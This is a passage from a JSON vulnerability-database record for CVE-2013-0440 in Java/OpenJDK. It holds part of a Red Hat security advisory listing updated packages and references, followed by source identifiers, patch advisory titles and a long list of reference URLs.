6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-0424.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0425.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0426.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0427.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0428.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0431.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0432.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0433.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0434.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0435.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0440.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0441.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0442.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0443.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0444.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0445.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0450.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1475.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1476.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1478.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1480.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttp://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.5/NEWS\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFRFVXMXlSAg2UNWIIRAvzmAJsEIinMVfUD8oFejiNBbKBOxDtgqwCePy0t\nWzOE5rFNiST5oFX5kr3mRQA=\n=+39R\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2013-0440" }, { "db": "CERT/CC", "id": "VU#858729" }, { "db": "BID", "id": "57712" }, { "db": "VULMON", "id": "CVE-2013-0440" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "120166" }, { "db": "PACKETSTORM", "id": "99047" }, { "db": "PACKETSTORM", "id": "120971" }, { "db": "PACKETSTORM", "id": "120334" }, { "db": "PACKETSTORM", "id": "120735" }, { "db": "PACKETSTORM", "id": "120204" }, { "db": "PACKETSTORM", "id": "120167" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#858729", "trust": 2.2 }, { "db": "NVD", "id": "CVE-2013-0440", "trust": 2.2 }, { "db": "BID", "id": "57712", "trust": 1.4 }, { "db": "USCERT", "id": "TA13-032A", "trust": 1.1 }, { "db": "HITACHI", "id": "HS11-003", "trust": 0.4 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "SECUNIA", "id": "43627", "trust": 0.2 }, { "db": "VULMON", "id": "CVE-2013-0440", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123734", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120166", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "99047", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120971", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120334", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120204", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120167", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#858729" }, { "db": "VULMON", "id": "CVE-2013-0440" }, { "db": "BID", "id": "57712" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "120166" }, { "db": "PACKETSTORM", "id": "99047" }, { "db": "PACKETSTORM", "id": "120971" }, { "db": "PACKETSTORM", "id": "120334" }, { "db": "PACKETSTORM", "id": "120735" }, { "db": "PACKETSTORM", "id": "120204" }, { "db": "PACKETSTORM", "id": "120167" }, { "db": "NVD", "id": "CVE-2013-0440" } ] }, "id": "VAR-201302-0253", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-22T21:50:24.490000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Red Hat: Important: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130246 - security advisory" }, { "title": "Red Hat: Critical: java-1.5.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130624 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130245 - security advisory" }, { "title": "Red Hat: Important: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130247 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130625 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2013-156", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-156" }, { "title": "Amazon Linux AMI: ALAS-2013-155", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-155" }, { "title": "Red Hat: Critical: java-1.7.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130626 - security advisory" }, { "title": "Ubuntu Security Notice: openjdk-6, openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1724-1" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131456 - security advisory" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131455 - security advisory" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-0440" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-0440" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html" }, { "trust": 1.5, "url": "http://www.kb.cert.org/vuls/id/858729" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-0247.html" }, { "trust": 1.2, "url": "http://icedtea.classpath.org/hg/release/icedtea6-1.11/file/icedtea6-1.11.6/news" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-0246.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/57712" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-0237.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-0236.html" }, { "trust": 1.1, "url": "http://www.us-cert.gov/cas/techalerts/ta13-032a.html" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=859140" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2013-0245.html" }, { "trust": 1.1, "url": "http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/5c1e8b779c65" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00014.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00034.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=136439120408139\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=136570436423916\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=136733161405818\u0026w=2" }, { "trust": 1.1, "url": "https://wiki.mageia.org/en/support/advisories/mgasa-2013-0056" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:095" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19397" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19285" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19229" }, { "trust": 1.1, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a16558" }, { "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html" }, { "trust": 0.8, "url": "http://taosecurity.blogspot.com/2012/11/do-devs-care-about-java-insecurity.html?showcomment=1353874245992#c4794680666510382012" }, { "trust": 0.8, "url": "http://codeascraft.etsy.com/2013/03/18/java-not-even-once/" }, { "trust": 0.8, "url": "http://blogs.technet.com/b/srd/archive/2013/05/29/java-when-you-cannot-let-go.aspx" }, { "trust": 0.6, "url": "https://downloads.avaya.com/css/p8/documents/100170924" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0428" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0442" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0441" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0426" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0440" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0443" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0425" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1476.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0428.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1480.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0425.html" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0443.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0427.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0433.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0441.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0432.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0450.html" }, { "trust": 0.5, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0426.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0440.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0445.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0442.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0424.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-1478.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0435.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2013-0434.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0429" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0433" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0435" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0434" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0432" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0424" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0445" }, { "trust": 0.4, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.4, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs11-003/index.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3342" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3213" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0450" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1475" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1478" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1480" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0427" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1476" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0444" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03748879" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644918" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21633300" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21633299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643832" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21634544" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637087" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034690" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034225" }, { "trust": 0.3, "url": "http://support.apple.com/kb/ht5666" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://prod.lists.apple.com/archives/security-announce/2013/feb/msg00000.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100171276" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24035073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03748879" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?docid=emr_na-c03909126-1" }, { "trust": 0.3, "url": "https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay\u0026spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c03714148-1%257cdoclocale%253d%" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.endcachetok=com.vignette.cachetoken\u0026javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalsta" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643248" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21670968" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21634069" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635160" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1ic92753" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg1ic92755" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1ic92756" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21650822" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100170079" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100169783" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650811" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640533" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640352" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21654375" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645096" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645100" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21634236" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643544" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642703" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640615" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635864" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637998" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21639830" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21649701" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21643697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638802" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642358" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21641931" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21641655" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648481" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21640697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21636324" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21639736" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638108" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21639549" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21641009" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21628927" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21649318" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21628250" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643618" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643513" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21649711" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21639487" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21627634" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033922" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24031555" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034621" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633311" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21632225" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644596" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633674" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0419.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0409.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0423.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0809.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-1487.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0351.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-1493.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-1541.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-3213.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0446.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-1473.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2012-3342.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-1486.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-0438.html" }, { "trust": 0.3, "url": "https://access.redhat.com/knowledge/articles/11258" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0446" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0351" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0409" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0419" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0431" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0423" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1540.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2419.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0401.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5089.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1722.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5079.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2422.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1721.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5081.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5071.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1532.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3216.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5069.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5084.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-4820.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1569.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5073.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-4823.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2435.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5068.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-4822.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3159.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1557.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5075.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.2, "url": 